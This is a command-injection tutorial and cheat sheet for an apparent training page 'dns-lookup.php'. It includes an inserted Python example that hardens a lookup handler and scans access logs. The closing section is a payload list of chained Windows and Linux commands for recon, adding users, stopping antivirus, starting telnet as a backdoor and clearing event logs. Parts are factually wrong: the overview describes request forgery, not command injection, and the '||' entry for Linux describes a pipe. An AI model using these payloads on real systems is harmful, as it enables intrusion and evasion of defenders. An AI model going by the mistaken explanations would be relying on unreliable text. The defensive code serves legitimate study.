Command Injection (CMDi) Overview, Discovery, Example, Exploitation
Overview
Command Injection may occur when an attacker is able to run a script in a user's browser. To forge a legitimate request, the script creates and sends the same parameters to the target website that would be sent if the user had submitted the legitimate form themselves. The target website knows the request has come from the user's browser but cannot detect that the request was created and sent by a malicious script running in the user's browser. As far as the target site can tell, the user submitted the request by using the web site in the expected way.
Discovery Methodology
Fuzz with command separators such as ;, & and &&, choosing the ones that apply to Linux or Windows respectively. Look for operating-system-related error messages, delays in the response that recur when the injection is repeated, or unexpected output in the response. The error may appear inside an HTML comment.
Attempt to determine the operating system type.
Reserved characters used in fuzzing for command injection
&: Used to separate multiple commands on one command line. Runs the first command then the second command.
&&: Used to run the command following && only if the preceding command is successful.
|| (Windows): Used to run the command following || only if the preceding command fails. Runs the first command then runs the second command only if the first command did not complete successfully.
|| (Linux): Redirects standard output of the first command to standard input of the second command.
( ): Used to nest commands.
#: Command-line comment symbol.
Exploitation
Inject operating system commands methodically. "ls" and "dir" are reasonably good commands to attempt, since most user accounts have permission to list directories by default and the two commands tend to be mutually exclusive (Windows will typically not execute "ls" and Linux will typically not execute "dir", though this behavior absolutely varies).
Prefix each injection with each of the reserved characters; then, for each prefix, also append each reserved character as a suffix to every injection.
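Added here as a defender's worked example, not code from the original post: the string-concatenation pattern that produces this bug next to its hardened form (allow-list validation plus an argv list, so no shell parses the input), and a check that flags the separators listed above in the query values of access-log lines. All function names and the sample log lines are constructed assumptions.

```python
"""Added example, not from the original post: a hardened front-end for a
dns-lookup style handler, plus a log check for the separators listed above.
Function names and the sample log lines are constructed for illustration."""
import re
from urllib.parse import parse_qs, urlparse

# Separator and grouping tokens the post lists for CMDi fuzzing (plus close
# relatives); "&&" sits before "&" so a double separator registers as both.
SHELL_TOKENS = ("&&", "||", "&", "|", ";", "(", ")", "#", "`", "$(", "\n")
# Allow-list for a DNS name: dot-separated labels of letters, digits, hyphens.
LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_hostname(value):
    """Accept only something that can be a DNS name; any separator fails."""
    if not value or len(value) > 253:
        return False
    return all(LABEL_RE.match(label) for label in value.split("."))


def vulnerable_command(host):
    """The pattern behind the bug: untrusted input glued into a string that is
    handed to a shell via system() or shell=True. Shown here, never executed."""
    return "nslookup " + host


def safe_lookup_argv(host):
    """Hardened form: validate against the allow-list, then pass the value as
    its own argv element (subprocess.run(argv, shell=False)); no shell parses it."""
    if not is_valid_hostname(host):
        raise ValueError("hostname rejected: " + repr(host))
    return ["nslookup", host]


# Constructed Apache-style access-log lines: one benign request and two that
# carry URL-encoded separators inside the host parameter.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /dns-lookup.php?host=example.com HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /dns-lookup.php?host=example.com%26%26whoami HTTP/1.1" 200 640',
    '10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /dns-lookup.php?host=example.com%3Bpwd HTTP/1.1" 500 88',
]


def flag_log_line(line):
    """Shell tokens present in any decoded query value of one access-log line."""
    m = re.search(r'"(?:GET|POST|HEAD) (\S+)', line)
    if not m:
        return []
    params = parse_qs(urlparse(m.group(1)).query, keep_blank_values=True)
    values = [v for vals in params.values() for v in vals]
    return [tok for tok in SHELL_TOKENS if any(tok in v for v in values)]


def scan_log(lines):
    """(line index, tokens) for each line whose query carries a shell token."""
    return [(i, t) for i, l in enumerate(lines) if (t := flag_log_line(l))]
```

Checking decoded parameter values rather than the raw query string is what makes the URL-encoded `%26%26` and `%3B` cases visible without tripping on the `&` that separates ordinary parameters.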
Examples
Examples for page "dns-lookup.php"
Recon: Discover available functionality
Using provided help
Windows XP: && help
Linux: && <cmd> --help
Linux: && man <cmd>
Recon: Determine current directory
Windows XP: && dir
Linux: && pwd
Recon: Chain commands to discover directory structure
Windows XP: && cd ../../.. && dir
Linux: && cd ../../.. && ls -l
Scanning: Get machine network settings, hostname, DNS servers, subnet mask, etc.
Windows XP: && ipconfig /all
Linux: && ifconfig
Scanning: Discover hosts on network
Windows XP: && ping -n 1 192.168.56.102
Linux: && ping -c 1 192.168.56.102
Scanning: Enumerate Current user
Windows XP: && set
Linux: && whoami
Scanning: Enumerate computers, users, groups, AD computers, AD users, AD groups
Windows XP: && net view [/domain]
Windows XP: && net user [/domain]
Windows XP: && net localgroup [/domain]
Gaining Access: Add user
Windows XP: && net user <username> /add
Linux: useradd <username>
Gaining Access: Delete user
Windows XP: && net user <username> /delete
Maintain Access: kill AV
net stop <av process>
Maintain Access: Kill AV/protective services or open backdoor services
Windows XP: && net stop <service name>
Windows XP: && net start telnet
Windows XP: && net stop telnet
Cover Tracks: Clear logs
Windows XP: && wevtutil cl